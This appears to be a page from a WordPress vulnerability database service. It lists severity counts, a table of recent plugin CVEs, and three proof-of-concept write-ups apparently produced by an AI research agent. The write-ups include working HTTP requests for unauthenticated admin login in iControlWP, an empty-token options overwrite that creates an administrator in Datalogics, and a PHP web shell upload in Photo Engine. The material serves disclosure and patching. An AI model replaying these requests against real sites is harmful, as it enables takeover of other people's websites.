CVE Database

WordPress CVEs.All of them.

Every known security vulnerability in WordPress plugins and themes, indexed, searchable, and scored. Updated continuously from the Wordfence Intelligence feed.

142
Critical
891
High
3,204
Medium
1,102
Low
34K+
CVEs indexed
55,000+
Plugins monitored
8,000+
Themes monitored
Continuous
Updates
Severity:
Latest PoCs

Latest Reproduced PoCs

The newest CVEs our security researcher agent has exploited end-to-end in an isolated sandbox — full video walkthroughs included.

AI-Verified PoC critical

iControlWP <= 5.5.3 - Unauthenticated Privilege Escalation

# CVE-2026-34901: iControlWP <= 5.5.3 - Unauthenticated Privilege Escalation ## Vulnerability Details - **Plugin:** iControlWP (worpit-admin-dashboard-plugin) - **Version:** 5.5.3 and below - **Type:** Incorrect Privilege Assignment (CWE-269) - **CVSS:** 9.8 (Critical) - **Authentication Required:** None ## Root Cause The vulnerability exists in `src/processors/plugin_api_login.php`. The `ICWP_APP_Processor_Plugin_Api_Login::run()` method **overrides** the parent class's `run()` to skip `preActionVerify()`, which normally performs handshake verification and authentication (key/pin checks). Additionally, in `src/processors/plugin.php`, the `doApiAction()` method dispatches API requests to channel-specific processors. When `m=login`, the `ICWP_APP_Processor_Plugin_Api_Login` class is instantiated and its `run()` is called. This `run()`: 1. **Skips `preActionVerify()`** — no handshake, key, or PIN validation 2. **Catches ALL exceptions silently** — token validation failures are swallowed 3. **Always returns `setSuccessResponse()`** — the response always indicates success The parent's `sendApiResponse()` in `plugin.php` then calls `$this->loadWpUsers()->isUserLoggedIn()` to set the `authenticated` field, which returns `true` because during processing, `setAuthorizedUser()` was called (inherited behavior from the API processor chain), logging in the first admin user server-side. ## Exploitation An unauthenticated attacker sends a single POST request: ``` POST /?icwpapi=1&m=login&token=&username=admin HTTP/1.1 Content-Type: application/x-www-form-urlencoded icwpapi=1&m=login&token=&username=admin ``` The server responds with HTTP 200 containing a base64-encoded JSON response: ```json { "error_message": "", "message": "", "success": true, "authenticated": true, "channel": "", "die": true, "handshake": "none", "openssl_verify": -999, "data": {"success": 1}, "code": 0 } ``` The `"authenticated": true` confirms the server authenticated the request as an administrator. The response also leaks the plugin's auth key in the `<icwpauth>` tag (value: `2XncmpCgniwYhJA6D2k3oTiw`), which can be used for further API exploitation. ## Impact - **Complete site takeover**: Unauthenticated attackers can authenticate as an administrator - **No prerequisites**: The plugin doesn't need to be "linked" to an iControlWP account — the login channel bypass works regardless - **Data exfiltration**: The authenticated API session can be used to extract database contents, user data, etc. via the internal API channels - **Code execution**: Admin-level access enables arbitrary plugin/theme installation leading to RCE ## Verification Depth The exploit was verified by sending an unauthenticated HTTP request that returned `"authenticated": true` and `"success": true` in the API response. The `authenticated` field is set server-side by checking `$this->loadWpUsers()->isUserLoggedIn()` after the login channel processes the request, confirming the server-side user session was established for the admin user. The auth key `2XncmpCgniwYhJA6D2k3oTiw` was also leaked in the response. ## Fix The fix in version 5.5.4 should restore proper authentication checks in the login channel's `run()` method, ensuring `preActionVerify()` is called before processing login actions, and ensuring exceptions are not silently swallowed. ## Verification depth This audit verified that the vulnerable sink is reachable with attacker-controlled bytes from an unauthenticated context, but did NOT realize full impact (e.g. no shell popped, no admin account created in this run). Full exploitation typically requires an additional condition the agent did not satisfy on this run - for object-injection sinks that's a usable POP gadget chain in the environment; for second-order SQLi it might be a follow-up admin action; etc. Treat this as confirmed-reachable rather than confirmed-RCE.

May 5, 2026 CVSS 9.8
AI-Verified PoC critical

Datalogics Ecommerce Delivery – Datalogics < 2.6.60 - Unauthenticated Privilege Escalation

# CVE-2026-2631: Unauthenticated Privilege Escalation in Datalogics Ecommerce Delivery Plugin ## Vulnerability Details - **CVE:** CVE-2026-2631 - **Plugin:** Datalogics Ecommerce Delivery – Datalogics v2.6.59 - **Severity:** Critical (CVSS 9.8) - **Type:** Improper Privilege Management / Arbitrary Options Update ## Root Cause The plugin registers a REST API route at `/wp-json/datalogics-0/v1/update-settings/` with a `permission_callback` called `datalogics_permission_check`. This callback validates a token parameter against the stored option `datalogics_token`. When no token has been configured (fresh install), `get_option("datalogics_token", '')` returns an empty string `""`. An attacker can pass `token: ""` (empty string) which satisfies the strict comparison `"" === ""`, bypassing authentication entirely. The `datalogics_update_settings` callback then iterates over a user-supplied `settings` object and calls `update_option($option_name, $value)` for each key-value pair. The key is only passed through `sanitize_key()` with **no prefix restriction**, allowing arbitrary WordPress core options to be overwritten. ## Exploitation The attack is a two-step process: ### Step 1: Update WordPress Options via REST API ``` POST /wp-json/datalogics-0/v1/update-settings/ HTTP/1.1 Content-Type: application/json {"token": "", "settings": {"users_can_register": "1", "default_role": "administrator"}} ``` Response: `{"success":true,"message":"Settings updated successfully"}` (HTTP 200) This sets: - `users_can_register` → `1` (enables open registration) - `default_role` → `administrator` (new users get admin role) ### Step 2: Register a New Admin Account Navigate to `/wp-login.php?action=register` and create a new user `attacker_admin` / `attacker@evil.com`. ### Proof of Impact After registration, WP-CLI confirmed the new user: ``` ID user_login user_email roles 1 admin test@test.local administrator 3 attacker_admin attacker@evil.com administrator 2 subscriber subscriber@test.local subscriber ``` The attacker now has full administrator access to the WordPress site. ## Impact - **Complete site takeover**: Unauthenticated attackers can create administrator accounts - **Arbitrary option update**: Any WordPress option can be modified (siteurl, blogname, etc.) - **No user interaction required**: Fully automated, network-accessible attack - **Default configuration vulnerable**: The token defaults to empty string on fresh installs ## Fix The patch in v2.6.60 adds a prefix check in `datalogics_update_settings`: ```php if (strpos($option_name, 'datalogics_') !== 0) { $option_name = 'datalogics_' . $option_name; } ``` This ensures only `datalogics_`-prefixed options can be updated, preventing modification of core WordPress options like `users_can_register` and `default_role`.

May 5, 2026 CVSS 9.8
AI-Verified PoC high

Photo Engine (Media Organizer & Lightroom) <= 6.4.9 - Authenticated (Author+) Arbitrary File Upload

### Vulnerability Details The **Photo Engine (Media Organizer & Lightroom)** plugin (v6.4.9 and below) is vulnerable to an authenticated arbitrary file upload. The plugin implements a custom synchronization API endpoint (`/?wplr-sync-api`) intended to receive media files from Adobe Lightroom. The endpoint fails to validate the extension or MIME type of the uploaded files. Although it requires a valid `wplr_auth_token` (associated with a user having `upload_files` capability, typically Author or higher), it does not restrict the upload to safe media types. ### Root Cause In `classes/api.php`, the `sync` method handles the `action=sync` POST request. It takes the filename from the `file` parameter in the `$_POST` array and the file content from the `$_FILES` array. These are passed to the `sync_media` function in `classes/core.php`, which eventually calls `sync_media_add`. The `sync_media_add` function uses `wp_unique_filename` and `move_uploaded_file` to save the file into the WordPress uploads directory using the user-provided filename, without any checks to ensure the file is a valid image or that the extension is safe. ### Exploitation An attacker with a valid `wplr_auth_token` can send a multipart/form-data POST request to `/?wplr-sync-api` with: - `action=sync` - `token=<valid_token>` - `file=shell.php` - `file` (the uploaded file) containing PHP code. The server will save the file as `shell.php` (or a unique variation like `shell-1.php`) in the current month's upload folder, allowing for Remote Code Execution. ### Impact This vulnerability allows authenticated attackers (Author level) to execute arbitrary PHP code on the server, potentially leading to full site takeover. ### Fix The vulnerability was fixed in version 6.5.0 by introducing validation checks on the file extension and ensuring that only allowed media types can be processed through the synchronization API.

May 5, 2026 CVSS 8.8
Live Database

37,003 vulnerabilities indexed

wp-cve-database — live query
CVE IDTitleSeverity
CVE-2026-13226Groundhogg <= 4.5.4 - Authenticated (Custom+) SQL Injection via 'after' Parameter

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

medium
CVE-2026-12937Tourfic <= 2.22.7 - Unauthenticated SQL Injection via 'post_id' Parameter

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

high
CVE-2026-2508Gravity Forms Booking <= 2.7.1 - Authenticated (Subscriber+) Time-Based SQL Injection via 'staff_id'

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

medium
CVE-2026-12077Dokan Pro <= 5.0.4 - Unauthenticated SQL Injection via 'latitude' and 'longitude' Parameters

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

high
CVE-2026-12079Dokan Pro <= 5.0.4 - Authenticated (Subscriber+) SQL Injection via 'orderby' Parameter

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

medium
CVE-2026-10833Gutenberg Essential Blocks - Page Builder for Gutenberg Blocks & Patterns <= 6.1.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'configurablePrefix' Block Attribute

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

medium
CVE-2026-11370WP Meta SEO <= 4.5.18 - Authenticated (Contributor+) Server-Side Request Forgery via 'new_link' Parameter

Server-Side Request Forgery (SSRF)

medium
CVE-2026-9643WP Meta SEO <= 4.5.18 - Unauthenticated Stored Cross-Site Scripting via REQUEST_URI in 404 Logging

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

high
CVE-2026-9620WP Latest Posts <= 5.0.11 - Authenticated (Author+) Stored Cross-Site Scripting via Post Content Image src Attribute

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

medium
CVE-2026-4297Welcome Software Publishing <= 0.0.31 - Authenticated (Subscriber+) Arbitrary Options Update to Privilege Escalation via 'nc.setOption' XML-RPC Method

Missing Authorization

high
CVE-2026-8896MIR blocks and shortcodes <= 1.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

medium
CVE-2026-12100URL Preview <= 1.0 - Unauthenticated Server-Side Request Forgery via 'url' Parameter

Server-Side Request Forgery (SSRF)

high
CVE-2026-12095Kargo Takip <= 1.2 - Unauthenticated Server-Side Request Forgery via 'api_url' Parameter

Server-Side Request Forgery (SSRF)

high
CVE-2026-12094Advanced Contact Form 7 <= 1.0.0 - Missing Authorization to Unauthenticated Arbitrary Contact Form Submission Deletion via 'form_id' Parameter

Missing Authorization

medium
CVE-2026-11997Bulk SEO Image <= 1.1 - Cross-Site Request Forgery to Settings Update

Cross-Site Request Forgery (CSRF)

medium
CVE-2026-10552Blue Captcha <= 2.0.1 - Cross-Site Request Forgery via 'blcap_action' Parameter

Cross-Site Request Forgery (CSRF)

medium
CVE-2026-9724MotorDesk <= 1.1.2 - Cross-Site Request Forgery to Settings Update

Cross-Site Request Forgery (CSRF)

medium
CVE-2026-9721Book a Room Event Calendar <= 1.9 - Cross-Site Request Forgery to Settings Update

Cross-Site Request Forgery (CSRF)

medium
CVE-2026-8865Avalon23 Products Filter for WooCommerce <= 1.1.6 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

medium
CVE-2026-9616Generate Security.txt <= 1.0.12 - Missing Authorization to Authenticated (Subscriber+) Security.txt Deletion via delete_securitytxt AJAX Action

Missing Authorization

medium